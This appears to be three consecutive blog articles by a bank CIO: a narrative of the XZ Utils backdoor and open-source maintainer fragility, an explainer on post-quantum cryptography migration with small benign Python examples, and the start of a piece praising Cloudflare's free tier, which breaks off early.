On a quiet Friday evening in late March 2024, a Microsoft engineer named Andres Freund was running some routine benchmarks on his Debian development box when he noticed something strange. SSH logins were taking about 500 milliseconds longer than they should have. Failed login attempts from automated bots were chewing through an unusual amount of CPU. Most engineers would have shrugged it off. Freund did not. He pulled on the thread, and what he found on the other end was a meticulously planned, state sponsored backdoor that had been three years in the making, hidden inside a tiny compression library that almost nobody had ever heard of, but that sat underneath virtually everything on the internet.
If he had not noticed that half second delay, you might be reading about the worst cybersecurity breach in human history instead of this article.
This is the story of XZ Utils, CVE-2024-3094, and the terrifying fragility hiding in plain sight beneath the digital world.
1. Everything You Do Online Runs on Linux. Everything.
Before we get to the attack, you need to understand something that most people never think about. Almost the entire internet runs on Linux. Not Windows. Not macOS. Linux.
Over 96% of the top one million web servers on Earth run Linux. 92% of all virtual machines across AWS, Google Cloud, and Microsoft Azure run Linux. 100% of the world’s 500 most powerful supercomputers run Linux, and that has been the case since 2017. Android, which powers 85% of the world’s smartphones, is built on the Linux kernel. Every time you send a WhatsApp message, stream Netflix, make a bank transfer, check your email, order food, hail a ride, or scroll through social media, your request is almost certainly being processed by a Linux machine sitting in a data centre somewhere.
Linux is not a product. It is not a company. It started in 1991 when a Finnish university student named Linus Torvalds decided to write his own operating system kernel because he could not afford a UNIX license. The entire philosophy traces back even further, to the 1980s, when Richard Stallman got so frustrated that he could not modify proprietary printer software at MIT to fix a paper jam notification that he launched the Free Software movement and the GNU project. Torvalds wrote the kernel. The GNU project supplied the tools. Together they created a free, open operating system that anyone could inspect, modify, and redistribute.
That openness is why Linux won. It is also why what happened with XZ was possible.
2. The Most Important Software You Have Never Heard Of
XZ Utils is a compression library. It squeezes data to make files smaller. It has no website worth visiting, no marketing team, no venture capital, no logo designed by an agency. It does one thing, quietly and reliably, inside Linux systems across the planet.
You have almost certainly never typed “xz” into anything. But xz has been working for you every single day. It compresses software packages before they are downloaded to your devices. It compresses kernel images. It compresses the backups that keep your data safe. It sits in the dependency chains of tools that handle everything from web traffic to secure shell (SSH) connections, the protocol that system administrators use to remotely manage servers. If SSH is the front door to every Linux server on the internet, xz was sitting in the lock mechanism.
For years, XZ Utils was maintained by essentially one person: a Finnish developer named Lasse Collin. He worked on it in his spare time. There was no salary, no team, no corporate sponsor, no security audit budget. Just one person and an issue queue. This arrangement is completely normal in open source. It is also completely terrifying.
3. The Long Con: A Three Year Espionage Operation
In October 2021, a new GitHub account appeared under the name “Jia Tan.” The account began submitting patches to XZ Utils. Small things. Helpful things. An editor configuration file here, a minor code improvement there. The contributions were competent, consistent, and completely legitimate. Over the next year, Jia Tan built a genuine track record of useful work.
Then, starting in April 2022, something else began happening. A handful of previously unknown accounts began appearing on the XZ Utils mailing list, publicly pressuring Lasse Collin. An account calling itself “Jigar Kumar” complained that patches were languishing and declared that progress would not happen until there was a new maintainer. Another account, “Dennis Ens,” piled on. The messages were not overtly hostile but carried a steady drumbeat of criticism and implied urgency. When Collin responded by mentioning his own long term mental health struggles and limited bandwidth, one of the accounts replied with something that reads, in hindsight, like a calculated psychological strike: expressing sympathy about the mental health issues while suggesting that Collin should recognise his own limits and pass maintainership to someone else.
These were almost certainly sock puppet accounts. Security journalist Brian Krebs later noted that none of the email addresses associated with these accounts appeared anywhere else on the internet, including in massive data breach dumps. That kind of total digital absence across multiple identities is extraordinarily rare and strongly suggests a coordinated operation that was planned from the beginning.
Waiting in the wings with a spotless contribution history was Jia Tan.
Collin eventually relented. By 2023, Jia Tan had been elevated to co-maintainer with direct commit access and release signing privileges. In an email to the mailing list, Collin even noted that Jia Tan had been helping a lot off-list and was “practically a co-maintainer already.”
The trap had been set with extraordinary patience.
4. The Backdoor: Hiding a Master Key in Plain Sight
In February and March 2024, Jia Tan made the move. Two carefully crafted binary test files were committed to the XZ Utils repository. Binary files are not human readable, and storing them in a tests directory is completely normal for a compression library. Nobody would look twice at them. But those files were not test data. They were encrypted payloads.
Jia Tan then modified the build process, specifically a script called build-to-host.m4, so that during compilation the malicious payloads would be silently extracted and injected into the liblzma library. The modified build script was only present in the distributed tar archive, not in the Git source code that most reviewers would examine. This was deliberate misdirection, exploiting the gap between what developers see when they browse a repository and what actually gets compiled on a target system.
The injected code targeted OpenSSH’s authentication mechanism. Through a chain of library dependencies involving systemd and glibc, the backdoor hijacked a cryptographic function called RSA_public_decrypt, replacing it with malicious code. The effect was devastating in its elegance: anyone possessing a specific Ed448 private key could bypass SSH authentication entirely and execute arbitrary code on any affected machine.
In other words, the attacker would have had a master key to every compromised Linux server on Earth.
The vulnerability was assigned CVE-2024-3094 with a CVSS score of 10.0, the maximum possible severity rating. Computer scientist Alex Stamos called it what it was: potentially the most widespread and effective backdoor ever planted in any software product. Akamai’s security researchers noted it would have dwarfed the SolarWinds compromise. The attackers were within weeks of gaining immediate, silent access to hundreds of millions of machines running Fedora, Debian, Ubuntu, and other major distributions.
5. Saved by Half a Second
On 28 March 2024, Andres Freund, a Microsoft principal engineer who also happens to be a PostgreSQL developer and committer, was doing performance testing on a Debian Sid (unstable) installation. He noticed that SSH logins were consuming far more CPU than they should, and that even failing logins from automated bots were taking half a second longer than expected. Half a second. That is the margin by which the internet was saved from what would have been the most catastrophic supply chain attack in computing history.
Freund did not dismiss the anomaly. He investigated. He traced the CPU spike and the latency increase to the updated xz library. He dug into the build artefacts. He found the obfuscated injection code. And on 29 March 2024, he published his findings to the oss-security mailing list.
The response was immediate and global. Red Hat issued an urgent security alert. CISA published an advisory. GitHub suspended Jia Tan’s account and disabled the XZ Utils repository. Every major Linux distribution began emergency rollbacks. Canonical delayed the Ubuntu 24.04 LTS beta release by a full week and performed a complete binary rebuild of every package in the distribution as a precaution.
The tower shook, but it did not fall. And it did not fall because one engineer thought half a second of unexplained latency was worth investigating on a Friday evening.
6. The Uncomfortable Architecture of the Internet
There is a famous XKCD comic, number 2347, that shows the entire modern digital infrastructure as a towering stack of blocks, with one tiny block near the bottom labelled “a project some random person in Nebraska has been thanklessly maintaining since 2003.” It was a joke. Then XZ happened and it stopped being funny.
Here is what the actual dependency stack looks like in simplified form:
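Your apps: banking, streaming, messaging, social media
  run on cloud platforms: AWS, Google Cloud, Azure
  which run Linux distributions: Debian, Ubuntu, Fedora
  which depend on core system services: OpenSSH, systemd, glibc
  which link against tiny utility libraries: liblzma (XZ Utils), zlib
  which are maintained by one unpaid volunteer in their spare time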
Each layer assumes the one below it is solid. The higher you build, the less anyone thinks about the foundations. Trillion dollar companies, national defence systems, hospital networks, stock exchanges, telecommunications grids, and critical infrastructure all sit on top of libraries maintained by volunteers who do the work because they care, not because anyone is paying them.
The XZ incident made this fragility impossible to ignore. A compression utility that most people have never heard of turned out to be sitting in the authentication pathway for remote access to Linux systems deployed globally. A single exhausted maintainer was socially engineered into handing the keys to an adversary. And the whole thing nearly went undetected.
7. The Ghost in the Machine
We still do not know who Jia Tan actually is. Analysis of commit timestamps suggests the attacker worked office hours in a UTC+2 or UTC+3 timezone. They worked through Lunar New Year but took off Eastern European holidays including Christmas and New Year. The name “Jia Tan” suggests East Asian origin, possibly Chinese or Hokkien, but the work pattern does not align with that geography. The operational security was exceptional. Every associated email address was created specifically for this campaign and has never appeared in any data breach. Every IP address was routed through proxies.
The consensus among security researchers, including teams at Kaspersky, SentinelOne, Akamai, and CrowdStrike, is that this was almost certainly a state sponsored operation. The patience (three years), the sophistication (the build system injection, the encrypted payloads hidden in test binaries, the deliberate gap between the Git source and the release tarball), and the multi-identity social engineering campaign all point to a resourced intelligence operation, not a lone actor.
SentinelOne’s analysis found evidence that further backdoors were being prepared. Jia Tan had also submitted a commit that quietly disabled Landlock, a Linux kernel sandboxing feature that restricts process privileges. That change was committed under Lasse Collin’s name, suggesting the commit metadata may have been forged. The XZ backdoor, in other words, was likely just the first move in a longer campaign.
8. The Billion Dollar Assumption
Here is the maths that should keep every CIO awake at night. Linux powers an estimated 90% of cloud infrastructure. The global cloud market generates hundreds of billions of dollars in annual revenue. Financial services, healthcare, telecommunications, logistics, defence, and government services all depend on it. SAP reports that 78.5% of its enterprise clients deploy on Linux. The Linux kernel itself contains over 34 million lines of code contributed by more than 11,000 developers across 1,780 organisations.
And yet, deep in the foundations of this ecosystem, critical libraries are maintained by individuals working in their spare time, with no security budget, no formal audit process, no staffing, and no funding proportional to the economic value being extracted from their work.
The companies building on top of this stack generate trillions in aggregate revenue. The people maintaining the foundations often receive nothing. The gap between the value extracted and the investment returned is not a rounding error. It is a structural vulnerability, and the XZ incident proved that adversaries know exactly how to exploit it.
9. Why This Will Happen Again
The uncomfortable truth is that the open source model that made the modern internet possible also created a systemic single point of failure that cannot be patched with a software update.
Social engineering attacks are getting more sophisticated. Large language models can now generate convincing commit histories, craft personalised pressure campaigns adapted to a maintainer’s psychological profile, and manage multiple fake identities simultaneously at a scale that would have been impossible even two years ago. What took the XZ attackers three years of patient reputation building could potentially be compressed into months using AI driven automation.
Meanwhile, the number of single maintainer critical projects has not decreased. The funding landscape has improved marginally through initiatives like the Open Source Security Foundation and GitHub Sponsors, but the investment remains a fraction of what the problem demands. The fundamental dynamic, companies worth billions depending on code maintained by individuals worth nothing to those companies, has not changed.
The XZ backdoor was caught because one curious engineer refused to ignore half a second of unexplained latency. That is not a security strategy. That is luck.
10. What Needs to Change
The Jenga tower still stands, but the XZ incident demonstrated exactly how fragile it is. The blocks at the bottom, the invisible libraries, the thankless utilities, the compression tools nobody has heard of, are the ones holding everything up. And they are precisely the ones receiving the least attention.
The solution is not to abandon open source. The solution is to treat it like the critical infrastructure it actually is. That means sustained corporate investment in the projects companies depend on, not charitable donations but genuine funded maintenance and security audit commitments. It means governance models that can detect and resist social engineering campaigns targeting burnt out solo maintainers. It means recognising that the person maintaining a compression library in their spare time is not a hobbyist. They are, whether they intended it or not, a load bearing wall in the architecture of the global economy.
Richard Stallman started this whole thing because he could not fix a printer. More than four decades later, the philosophy of openness he championed underpins nearly every digital interaction on Earth. That is an extraordinary achievement. But the scale has outgrown the model, and the adversaries have noticed.
The next Andres Freund might not be running benchmarks on a Friday evening. The next half second might not get noticed.
There is a quiet revolution happening in physics laboratories around the world, and most of the people who should be worried about it are not paying attention yet. That is about to change. Quantum computing is advancing faster than anyone predicted five years ago, and when it matures, it will shatter the encryption that protects virtually everything we hold dear in our digital lives: bank transactions, medical records, state secrets, and the messages you send to your family.
This is not science fiction. It is an engineering problem with a hard deadline, and the deadline is closer than you think.
1. Let’s Start at the Beginning: What Is Encryption, Really?
Before we can understand the quantum threat, we need a clear picture of what encryption is and why it works.
Imagine you want to send a secret message to a friend. You agree on a secret code beforehand, say, shift every letter three positions forward in the alphabet, so “A” becomes “D” and “B” becomes “E”. Anyone who intercepts the message sees gibberish. Only your friend, who knows the shift rule, can decode it. That is the essence of encryption.
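A toy version in Python makes the idea concrete (an illustration of the principle only, never a real cipher):

def caesar(message: str, shift: int) -> str:
    # Shift each letter by a fixed amount, wrapping around the alphabet
    out = []
    for ch in message:
        if ch.isalpha():
            base = ord('A') if ch.isupper() else ord('a')
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return ''.join(out)

secret = caesar("ATTACK AT DAWN", 3)    # "DWWDFN DW GDZQ"
plain = caesar(secret, -3)              # decoding is just the reverse shift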
Modern encryption works on the same principle but uses mathematics instead of alphabet shifts. Specifically, it relies on mathematical problems that are trivially easy to do in one direction but astronomically hard to reverse. The classic example is multiplication. Take two large prime numbers, each a few hundred digits long, and multiply them together. Any computer can do that multiplication in a fraction of a second. But if I hand you only the result and ask you to find the original two prime numbers, even the most powerful computers on Earth today would take longer than the age of the universe to work it out.
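You can feel that asymmetry even at toy scale. The sketch below multiplies two six digit primes instantly, then recovers them by brute force trial division. Even at this tiny size the hard direction takes roughly half a million steps, and every additional digit makes it dramatically worse:

p, q = 999_983, 1_000_003     # small primes for illustration; real RSA primes have hundreds of digits
n = p * q                     # the easy direction: instant

def factor(n: int) -> tuple:
    # The hard direction: trial division, feasible only because n is tiny
    d = 3                     # n is odd here, so only odd divisors need checking
    while d * d <= n:
        if n % d == 0:
            return d, n // d
        d += 2
    raise ValueError("no factor found")

print(factor(n))              # (999983, 1000003), after roughly 500,000 divisions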
That difficulty is the foundation of most encryption you encounter every day.
2. The Algorithms We Rely On Right Now
The encryption landscape today rests on a relatively small number of foundational algorithms. Understanding them at a high level matters, because each has a different vulnerability profile against quantum attacks.
RSA (named after its inventors Rivest, Shamir, and Adleman) is the workhorse of public key cryptography. When your browser shows a padlock icon and establishes a secure HTTPS connection, RSA is almost certainly involved. It protects the handshake that sets up the encrypted tunnel. RSA’s security rests entirely on that multiplication problem described above, the difficulty of factoring large numbers.
Elliptic Curve Cryptography (ECC) is a more modern and efficient cousin of RSA. It provides the same level of security with much shorter key lengths, making it preferred in environments where computing power is constrained: think mobile devices, payment terminals, and IoT sensors. ECC underpins much of the TLS encryption used in banking APIs and mobile applications today. Its security rests on a related mathematical problem called the discrete logarithm problem on elliptic curves.
AES (Advanced Encryption Standard) is a symmetric cipher, meaning both parties use the same key. It is used to encrypt the actual data once RSA or ECC has established a secure channel. AES protects data at rest: encrypted hard drives, database columns, archived files. It is widely considered robust and is used by governments and militaries worldwide.
SHA (Secure Hash Algorithm) is not an encryption algorithm in the traditional sense but a hashing function. It converts any input into a fixed length fingerprint. Banks use SHA to verify data integrity: if even a single byte of a transaction record changes, the hash changes completely. SHA also underpins digital signatures, which prove that a document has not been tampered with and that it came from a verified source.
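The fingerprint behaviour is easy to demonstrate with Python's standard library:

import hashlib

record = b"PAY 100.00 TO ACCOUNT 12345678"
tampered = b"PAY 900.00 TO ACCOUNT 12345678"   # a single character changed

print(hashlib.sha256(record).hexdigest())
print(hashlib.sha256(tampered).hexdigest())
# The two fingerprints bear no resemblance to each other: changing even
# one byte of the input scrambles the entire hash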
The TLS protocol (Transport Layer Security), which you encounter every time you see “https” in your browser, combines these algorithms. RSA or ECC negotiates a shared secret, AES encrypts the actual data flowing back and forth, and SHA verifies integrity. It is an elegant system that has served us well for decades.
3. Enter the Quantum Computer
A classical computer, the one in your laptop, your phone, the servers running your bank, processes information as bits. Each bit is either a 0 or a 1. Every calculation is a sequence of operations on these binary values.
A quantum computer uses quantum bits, or qubits. And here is where physics gets strange. A qubit can be a 0, a 1, or, thanks to a quantum property called superposition, effectively both at the same time. Furthermore, qubits can be entangled, meaning the state of one qubit is instantly correlated with the state of another, regardless of physical distance. These properties allow a quantum computer to explore enormous numbers of possible solutions simultaneously rather than one at a time.
For most problems, this does not help much. But for certain specific mathematical problems, quantum computers are not just faster, they are exponentially faster in ways that completely break the difficulty assumptions that encryption relies on.
In 1994, a mathematician named Peter Shor published an algorithm, now called Shor’s Algorithm, that runs on a quantum computer and can factor large numbers exponentially faster than any classical computer. When a sufficiently powerful quantum computer running Shor’s Algorithm exists, RSA and ECC are broken. Not weakened. Broken. What currently takes longer than the age of the universe takes hours.
A second relevant algorithm, Grover’s Algorithm, provides a quadratic speedup for searching through unstructured data. This halves the effective key length of symmetric algorithms like AES. AES-128 becomes roughly as secure as a 64-bit key, which is crackable. AES-256 becomes roughly equivalent to AES-128, still acceptable for now, but the margin has shrunk significantly.
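The arithmetic behind that halving is worth seeing once. A rough sketch, in which the guess rate is an illustrative assumption rather than a benchmark of any real machine:

# Grover's Algorithm cuts brute force search from 2^n tries to roughly 2^(n/2)
GUESSES_PER_SECOND = 1e12     # assumption: a notional trillion guesses per second
SECONDS_PER_YEAR = 3.156e7

def years_to_crack(effective_bits: int) -> float:
    return (2 ** effective_bits) / GUESSES_PER_SECOND / SECONDS_PER_YEAR

print(f"AES-128 vs classical search: {years_to_crack(128):.1e} years")   # ~1.1e19 years
print(f"AES-128 vs Grover:           {years_to_crack(64):.1e} years")    # under a year
print(f"AES-256 vs Grover:           {years_to_crack(128):.1e} years")   # still ~1.1e19 years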
4. The “Harvest Now, Decrypt Later” Problem
Here is the part that should genuinely alarm every security professional and every executive responsible for sensitive data.
Quantum computers powerful enough to break RSA and ECC do not exist today. The current state of the art, systems from IBM, Google, and others, offers hundreds to a few thousand qubits, but these machines are error prone and nowhere near the scale needed to run Shor’s Algorithm on real encryption keys. Most credible estimates put that capability somewhere between five and fifteen years away.
So why does this matter today?
Because sophisticated adversaries, nation states in particular, are almost certainly already collecting encrypted data they cannot currently read. They are storing it, waiting. When quantum capability arrives, they will decrypt years of harvested communications and data. This is not speculation. It is a rational strategy, and it costs almost nothing to execute given how cheap data storage has become.
Consider what that means in practice. A message encrypted and transmitted today that remains sensitive in ten years, say, a diplomatic cable, a long term business strategy, or a patient’s medical history, is already compromised in principle. The lock has been photographed. The key just has not been cut yet.
For banking, this has profound implications. Long term financial records, customer identification data, credit histories, and interbank settlement data could all be sitting in harvested caches waiting for quantum decryption.
5. Post Quantum Cryptography: The Response
The good news is that the mathematical and cryptographic community has known about this threat for decades and has been working on solutions. These solutions go by the name Post Quantum Cryptography (PQC), or sometimes Quantum Resistant Cryptography.
The approach is straightforward in concept: replace the mathematical problems that quantum computers can solve easily with different mathematical problems that quantum computers cannot. Three main families of problems have proven promising.
Lattice based cryptography relies on the difficulty of finding short vectors in high dimensional geometric structures called lattices. Imagine a crystal with hundreds of dimensions: finding a specific point within it is computationally intractable for both classical and quantum computers. Lattice problems have been studied for decades and have strong theoretical underpinnings. The leading PQC algorithms, CRYSTALS-Kyber for key encapsulation and CRYSTALS-Dilithium for digital signatures, are lattice based.
Hash based cryptography builds security on the same SHA hashing functions already in widespread use. SPHINCS+ is the primary hash based signature scheme. Its security assumptions are more conservative and better understood than newer approaches, which makes it attractive for high assurance applications.
Code based cryptography is based on the difficulty of decoding certain types of error correcting codes. This is one of the oldest areas of post quantum research, with the McEliece cryptosystem dating to 1978.
6. The NIST Standardisation Process
The United States National Institute of Standards and Technology (NIST) recognised the urgency of this problem in 2016 and launched a multi year global competition to evaluate and standardise post quantum algorithms. Cryptographers from around the world submitted candidates, and the process involved years of public scrutiny, attempted attacks, and mathematical analysis.
In August 2024, NIST published its first set of finalised PQC standards. These are not experimental proposals; they are production ready specifications intended for immediate adoption.
The three initial standards are ML-KEM (based on CRYSTALS-Kyber, used for key encapsulation, establishing shared secrets), ML-DSA (based on CRYSTALS-Dilithium, used for digital signatures), and SLH-DSA (based on SPHINCS+, a hash based signature alternative). A fourth standard, FN-DSA (based on Falcon, another lattice based scheme optimised for smaller signature sizes), is expected to be finalised shortly.
These standards represent the global consensus on what quantum resistant cryptography looks like for the next generation of secure systems.
7. What This Means for Your Technology Stack
This is where things get very concrete and very expensive. The encryption algorithms described above are not isolated modules sitting in one place. They are woven into virtually every layer of modern technology infrastructure, and ripping them out and replacing them is a massive undertaking.
7.1 Data in Flight
Every TLS connection uses RSA or ECC for its handshake. That covers your web applications, your APIs, your service to service communication inside microservice architectures, your database connections, your message brokers, your load balancers, and your VPNs. All of it needs to be upgraded to support hybrid key exchange, a transitional approach that combines a classical algorithm with a post quantum one, providing protection even if one is compromised.
Modern versions of TLS (1.3) and the underlying libraries, OpenSSL, BoringSSL, and similar, are already adding support for post quantum key exchange. But every system that terminates TLS needs to be upgraded: web servers, API gateways, CDN edge nodes, load balancers, network appliances, HSMs (Hardware Security Modules), and more. Many of these have long hardware refresh cycles and embedded firmware that is difficult to update.
7.2 Data at Rest
AES-256 remains acceptable against quantum attacks: Grover’s Algorithm halves its effective strength, but 256-bit strength halved is still 128-bit equivalent strength, which is currently considered secure. The immediate priority for data at rest is therefore ensuring you are using AES-256 everywhere, not AES-128. Many legacy systems still use AES-128 or, worse, older algorithms like 3DES, which need to be remediated regardless of quantum concerns.
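For context, this is what the AES-256 baseline looks like with the widely used Python cryptography package; a minimal sketch using authenticated AES-GCM:

import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=256)    # insist on 256-bit keys, not 128
aesgcm = AESGCM(key)

nonce = os.urandom(12)                       # standard 96-bit GCM nonce, never reused with the same key
ciphertext = aesgcm.encrypt(nonce, b"customer record", None)
assert aesgcm.decrypt(nonce, ciphertext, None) == b"customer record"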
However, the key management infrastructure protecting your AES keys is another matter entirely. Those keys are typically encrypted or exchanged using RSA or ECC. If your key management system, whether that is a cloud KMS service, an on premise HSM cluster, or a custom solution, uses classical public key cryptography to protect AES keys, the chain of trust is broken at the key management layer even if the data encryption itself is quantum resistant. Key management infrastructure needs to be upgraded to use post quantum algorithms for key wrapping and key exchange.
7.3 Digital Certificates and PKI
Public Key Infrastructure (PKI) is the system of trust that underpins digital certificates, the mechanism that allows your browser to verify it is talking to your real bank and not an impersonator. Every certificate in use today is signed using RSA or ECC. Certificate authorities, certificate revocation mechanisms, OCSP responders, and the trust stores built into every operating system and browser all need to be migrated to post quantum signature schemes.
This is complicated by the fact that certificates have expiry dates measured in months to a few years, so the migration can be staged, but the root certificates at the top of the trust hierarchy are long lived and need early attention. Browser vendors and operating system providers are already working on this, but enterprise PKI environments, which often include private certificate authorities for internal services, need their own migration plans.
7.4 Secure Shell (SSH)
SSH is the protocol used to securely administer servers and network infrastructure. It uses RSA, ECC, and related algorithms for both host key authentication and user authentication. Every SSH server and client, which means virtually every Linux server, network device, and cloud instance, will need updated key types and algorithm preferences. The OpenSSH project has already added experimental support for post quantum key exchange, but enterprise environments need planned migration paths.
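You can check where your own estate stands already; recent OpenSSH releases ship a hybrid post quantum key exchange:

# List the key exchange algorithms your OpenSSH build supports
ssh -Q kex

# OpenSSH 9.x includes the hybrid option sntrup761x25519-sha512@openssh.com,
# which pairs a classical elliptic curve with the Streamlined NTRU Prime
# post quantum scheme, so a break of either one still leaves the other intact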
7.5 Code Signing and Software Supply Chain
Software companies sign their releases digitally so that operating systems and update mechanisms can verify that the software you are installing is genuine and has not been tampered with. These signatures use, you guessed it, RSA or ECC. A quantum capable adversary could forge signatures on malicious software. Migration to post quantum signature schemes for code signing is critical for long term software supply chain security.
7.6 Hardware Security Modules
HSMs are specialised hardware devices designed to perform cryptographic operations and store keys securely. They are the backbone of payment processing, certificate authorities, and high assurance key management. HSMs have long lifecycles (five to ten years is common), and many current generation devices have limited or no support for post quantum algorithms. Organisations need to inventory their HSMs and plan replacements or firmware upgrades accordingly. This is not cheap, and procurement lead times for specialised hardware can be long.
7.7 Internet of Things and Embedded Systems
Perhaps the most difficult part of the migration is embedded systems and IoT devices. Payment terminals, ATMs, smart meters, industrial control systems, and connected devices of every description run firmware with hardcoded cryptographic algorithms. Many cannot be updated remotely. Some cannot be updated at all. For the banking sector specifically, the number of deployed payment terminals and ATMs globally is enormous, and the logistics and cost of replacing or updating them is staggering.
8. The Banking Sector: A Special Case
Banks sit at the intersection of almost every dimension of this problem. They hold extraordinarily sensitive data about their customers: financial histories, identity documents, behavioural patterns. They are governed by strict regulatory frameworks that mandate specific security controls. And they operate complex ecosystems involving core banking systems that are decades old, modern digital banking platforms, real time payment rails, card networks, and a vast web of third party integrations.
The interbank settlement systems, the infrastructure through which banks settle obligations with each other, are critical national infrastructure. In South Africa, systems like SAMOS (the South African Multiple Option Settlement system) and the various payment clearing mechanisms operated by BankservAfrica represent the plumbing of the financial system. The cryptographic protections on these systems need to be quantum resistant before quantum threats materialise.
SWIFT, the global interbank messaging network, has already published guidance on post quantum migration timelines and is working on updates to its protocols. Card schemes including Visa and Mastercard are engaged in similar efforts. The PCI-DSS standard, which governs payment card security, will inevitably incorporate post quantum requirements in future versions.
Regulatory bodies globally are beginning to take notice. The Financial Stability Board has flagged quantum computing as a systemic risk. Central banks and prudential regulators are starting to ask questions about quantum readiness in their supervisory processes. Boards and executives who are not yet thinking about this should be.
9. Crypto Agility: The Architectural Principle That Changes Everything
One of the most important lessons from the post quantum migration is not specific to quantum at all. It is about a concept called crypto agility: designing systems so that cryptographic algorithms can be swapped out without fundamental architectural change.
Most systems built over the past twenty years hardcode specific algorithms deep in their implementations. Changing the algorithm means changing the code, testing the change, and deploying it: a significant engineering effort multiplied across every system in the estate. If the entire industry had adopted crypto agile architectures from the beginning, the quantum migration would be an operational challenge rather than an existential one.
Going forward, every new system should be built with crypto agility as a first class requirement. Algorithm selection should be a configuration concern, not a code concern. Cryptographic operations should be encapsulated behind well defined interfaces that can be backed by different implementations. Key management systems should be designed to support multiple algorithm types simultaneously.
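In code, crypto agility is mostly a thin layer of indirection. A minimal Python sketch (the registry and names are illustrative, not from any particular library):

from typing import Callable, Dict
import hashlib

# Map configuration names to implementations, so the algorithm is a
# configuration value rather than a hardcoded call site
HASHERS: Dict[str, Callable[[bytes], bytes]] = {
    "sha256": lambda data: hashlib.sha256(data).digest(),
    "sha3_256": lambda data: hashlib.sha3_256(data).digest(),
    # when a post quantum ready primitive is adopted, register it here;
    # no application call site needs to change
}

def fingerprint(data: bytes, algorithm: str = "sha256") -> bytes:
    # Application code calls this; 'algorithm' comes from configuration
    return HASHERS[algorithm](data)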
10. What Should You Be Doing Right Now?
The migration to post quantum cryptography is not a project that can be started when quantum computers become a near term reality. By then it will be too late. The harvest now, decrypt later threat means the window for protecting long lived sensitive data has already partially closed.
A practical roadmap looks something like this.
Start with a cryptographic inventory. You cannot protect what you cannot see. Every system, every data store, every API endpoint, every certificate needs to be catalogued with the algorithms it uses. This is tedious work, but it is foundational. Many organisations are surprised to discover how much classical cryptography is buried in unexpected places: legacy batch processes, backup systems, monitoring agents, and logging pipelines.
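Even a small script gets the inventory moving. The sketch below reads one PEM certificate with the Python cryptography package and reports its key type and signature algorithm; the file name is a placeholder, and the expiry accessor assumes a reasonably recent version of the library:

from cryptography import x509
from cryptography.hazmat.primitives.asymmetric import rsa, ec

# Placeholder path: point this at any certificate in your estate
with open("server-cert.pem", "rb") as f:
    cert = x509.load_pem_x509_certificate(f.read())

key = cert.public_key()
if isinstance(key, rsa.RSAPublicKey):
    print(f"RSA {key.key_size}-bit key (quantum vulnerable)")
elif isinstance(key, ec.EllipticCurvePublicKey):
    print(f"ECC key on {key.curve.name} (quantum vulnerable)")

print(f"Signature algorithm: {cert.signature_algorithm_oid}")
print(f"Expires: {cert.not_valid_after_utc}")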
Assess the sensitivity and longevity of your data. Not all data needs the same level of urgency. Data that will be public in five years and is not sensitive today is a lower priority. Data that must remain confidential for twenty years (long term contracts, personal identification records, health records) needs to be protected now with quantum resistant methods, or at minimum with hybrid approaches that add a post quantum layer on top of classical encryption.
Begin hybrid deployments for data in flight. Major cloud providers and CDN vendors already support hybrid key exchange in TLS. Enabling this configuration for internet facing services is a relatively low risk first step that provides immediate protection against harvest now, decrypt later attacks.
Plan your PKI migration. Identify your certificate authorities, understand your certificate inventory, and develop a migration plan for moving to post quantum signing algorithms. This is a long runway project given the dependencies on browser and OS trust stores, but the planning needs to start now.
Engage your hardware vendors. Ask your HSM vendors, network appliance vendors, and embedded system suppliers about their post quantum roadmaps. If they do not have credible answers, that should factor into your procurement decisions.
Build crypto agility into new systems. Every greenfield project should be designed from the outset to support algorithm agility. This is the easiest time to get it right.
Train your teams. Post quantum cryptography involves concepts that are unfamiliar to most engineers and architects. Building internal capability now pays dividends throughout the migration.
11. The Horizon
Quantum computing and post quantum cryptography are one of those rare convergences where the threat and the defence are both genuinely new. The mathematics is settled: we know what is broken, and we know what the replacements are. What remains is the enormous operational challenge of migrating the world’s technology infrastructure.
The organisations that treat this as an urgent priority today will be in a strong position as quantum capability advances. Those that wait for the threat to become immediate will face a chaotic scramble to protect data that is already potentially compromised.
We are not at the end of the encryption era. We are at a transition point, and the post quantum era is already beginning. The NIST standards are published. The algorithms are ready. The only question is how quickly we can deploy them.
The padlock on your digital life is being changed. The question for every organisation is whether they will do it on their own terms and timeline, or be forced to do it in a panic when the quantum threat arrives.
Andrew Baker is Chief Information Officer at Capitec Bank. He writes about enterprise architecture, cloud technology, and the future of banking at andrewbaker.ninja.
There is a truth that most technology vendors either do not understand or choose to ignore: the best sales pitch you will ever make is letting someone use your product for free. Not a watered-down demo, not a 14-day trial that expires before anyone has figured out the interface, but a genuinely generous free tier that lets people build real things and solve real problems. Cloudflare understands this better than almost anyone in the industry right now, and it has made me a genuine advocate in a way that no amount of marketing spend ever could.
1. How I Found Cloudflare and Almost Lost It
My journey with Cloudflare did not begin with enthusiasm. It began at Capitec, where I was evaluating infrastructure and security platforms at institutional scale. My initial view of Cloudflare was limited: it was a CDN with an API gateway capability, useful, but not architecturally differentiated in any meaningful way from competing options. My awareness of what genuinely set it apart was low.
The concerns I had at that stage were squarely enterprise concerns. The lack of private peering between Cloudflare and AWS in South Africa was a meaningful issue for Capitec specifically. For a major retail bank operating in this market, network latency, peering, and routing are not abstract considerations. They are hard requirements. The absence of a direct peering arrangement had me questioning whether Cloudflare could credibly serve the needs of a bank with millions of active customers.
Then came a series of outages in 2025. Any one of those incidents in isolation might have been forgivable, but cumulatively they put Cloudflare in a difficult position. For a platform whose core value proposition is reliability and availability, sustained turbulence shakes confidence.
What changed my perspective was not a sales conversation or an analyst briefing. It was personal experimentation. I started using Cloudflare for andrewbaker.ninja, my personal blog, after joining Capitec. That hands-on use opened up a completely different view of the platform. What I had evaluated as a CDN with an API gateway was actually something far more capable. I discovered R2, Cloudflare’s object storage offering. I worked through Workers in depth. I started building real functionality at the edge, not just routing traffic through it. Most significantly, our team began using Cloudflare Workers to create custom malware signals and block traffic based on behavioural patterns, turning what I had thought of as a passive network layer into an active security enforcement point.
That is the moment the evaluation changed. The peering concerns and the stability questions remained live issues, but I now had genuine product depth that allowed me to weigh them against a much clearer picture of Cloudflare’s architectural differentiation. That picture came entirely from free tier experimentation on a personal blog. It could not have come from a sales deck.
2. What Cloudflare Actually Gives You for Free
The Cloudflare free tier is, frankly, extraordinary. When I first started using it for andrewbaker.ninja, I expected the usual pattern: enough capability to see the shape of the product, but with enough gates and limits to push you toward a paid plan. What I found instead was a comprehensive platform that covers almost every dimension of modern web security and performance at zero cost.
